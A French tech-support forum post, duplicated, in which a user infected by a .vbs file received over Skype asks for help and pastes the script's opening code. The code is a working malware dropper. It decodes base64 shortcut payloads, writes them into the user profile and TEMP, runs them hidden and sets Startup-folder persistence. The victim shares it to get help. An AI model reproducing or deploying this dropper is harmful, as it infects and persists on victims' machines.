fichier vbs - Sécurité - Réseaux grand public / SoHo
MarshPosté le 19-04-2016 à 11:18:54
Bonjour,
Excusez-moi si je ne poste pas ça au bon endroit, mais j'ai un très gros soucis !
Un peu naif et pour aider quelqu'un j'ai ouvert un fichier .vbs sur skype, mais quelle horreur !
En effet maintenant mon PC ouvre des pages tout seul, des pages youtubes avec des musiques de Gregory Lemarchal, des lettres d'amour... -_-"
Et impossible de les ouvrir dans mon historique, il les ouvre je pense en navigation privée. J'ai lancer Malwarbyte, j'ai lancer un scan d'Avast (des fois maintenant je recois une petite notification comme quoi avast a freeze)
Je ne sais plus quoi faire s'il vous plait aidez moi !
Je vous montre les premières lignes du fichier lorsqu'on l'ouvre en .exe, dites moi evidemment si vous avez besoin de plus je ne voulais pas polluer pour rien!
Option Explicit
Dim outFile, FFF, FFFF,WshShell, WshShell1, WshShell2, WshShell3 ,Rurn1,Rurn2,Rurn3 ,strDesktop, strMyPath, outFileee, outFileeee, strMyPath1,objShell,Fso,unirarr,ff,FilesInZip,unirarrrr,desk,amour,serchelink,messangerrrlink Set WshShell = WScript.CreateObject("WScript.Shell" ) Set WshShell1 = WScript.CreateObject("WScript.Shell" ) Set WshShell2 = WScript.CreateObject("WScript.Shell" ) Set WshShell3 = WScript.CreateObject("WScript.Shell" )
Set objShell = CreateObject("Shell.Application" ) set Fso= WScript.CreateObject("Scripting.FileSystemObject" ) strDesktop = WshShell.SpecialFolders("Startup" ) strMyPath = WshShell.ExpandEnvironmentStrings("%USERPROFILE%" ) strMyPath1 = WshShell.ExpandEnvironmentStrings("%TEMP%" ) Dim meee Set meee = CreateObject("ADODB.Stream" ) meee.Type = 1 dim DM, EL Set DM = CreateObject("Microsoft.XMLDOM" ) Set EL = DM.createElement("tmp" ) EL.DataType = "bin.base64" outFile =strMyPath & "\2.zip" unirarr=strMyPath & "\amour.jpg" unirarrrr=strMyPath & "\serche.exe"
Marsh Posté le 19-04-2016 à 11:18:54
Bonjour,
Excusez-moi si je ne poste pas ça au bon endroit, mais j'ai un très gros soucis !
Un peu naif et pour aider quelqu'un j'ai ouvert un fichier .vbs sur skype, mais quelle horreur !
En effet maintenant mon PC ouvre des pages tout seul, des pages youtubes avec des musiques de Gregory Lemarchal, des lettres d'amour... -_-"
Et impossible de les ouvrir dans mon historique, il les ouvre je pense en navigation privée. J'ai lancer Malwarbyte, j'ai lancer un scan d'Avast (des fois maintenant je recois une petite notification comme quoi avast a freeze)
Je ne sais plus quoi faire s'il vous plait aidez moi !
Je vous montre les premières lignes du fichier lorsqu'on l'ouvre en .exe, dites moi evidemment si vous avez besoin de plus je ne voulais pas polluer pour rien!
Option Explicit
Dim outFile, FFF, FFFF,WshShell, WshShell1, WshShell2, WshShell3 ,Rurn1,Rurn2,Rurn3 ,strDesktop, strMyPath, outFileee, outFileeee, strMyPath1,objShell,Fso,unirarr,ff,FilesInZip,unirarrrr,desk,amour,serchelink,messangerrrlink
Set WshShell = WScript.CreateObject("WScript.Shell" )
Set WshShell1 = WScript.CreateObject("WScript.Shell" )
Set WshShell2 = WScript.CreateObject("WScript.Shell" )
Set WshShell3 = WScript.CreateObject("WScript.Shell" )
Set objShell = CreateObject("Shell.Application" )
set Fso= WScript.CreateObject("Scripting.FileSystemObject" )
strDesktop = WshShell.SpecialFolders("Startup" )
strMyPath = WshShell.ExpandEnvironmentStrings("%USERPROFILE%" )
strMyPath1 = WshShell.ExpandEnvironmentStrings("%TEMP%" )
Dim meee
Set meee = CreateObject("ADODB.Stream" )
meee.Type = 1
dim DM, EL
Set DM = CreateObject("Microsoft.XMLDOM" )
Set EL = DM.createElement("tmp" )
EL.DataType = "bin.base64"
outFile =strMyPath & "\2.zip"
unirarr=strMyPath & "\amour.jpg"
unirarrrr=strMyPath & "\serche.exe"
outFileee =strDesktop & "\messangerr.vbs"
desk =strDesktop & "\serche.vbs"
amour=strMyPath1 & "\amour.lnk"
serchelink=strMyPath1 & "\serche.lnk"
messangerrrlink=strMyPath1 & "\messangerrr.lnk"
If Fso.FileExists(unirarr) Then
FFF = "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"
EL.Text = FFF
FFFF = EL.NodeTypedValue
meee.Open
meee.Write FFFF
meee.SaveToFile amour, 2
meee.close
Rurn1 = WshShell1.Run(amour ,0)
Else
FFF = "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"
EL.Text = FFF
FFFF = EL.NodeTypedValue
meee.Open
meee.Write FFFF
meee.SaveToFile amour, 2
meee.close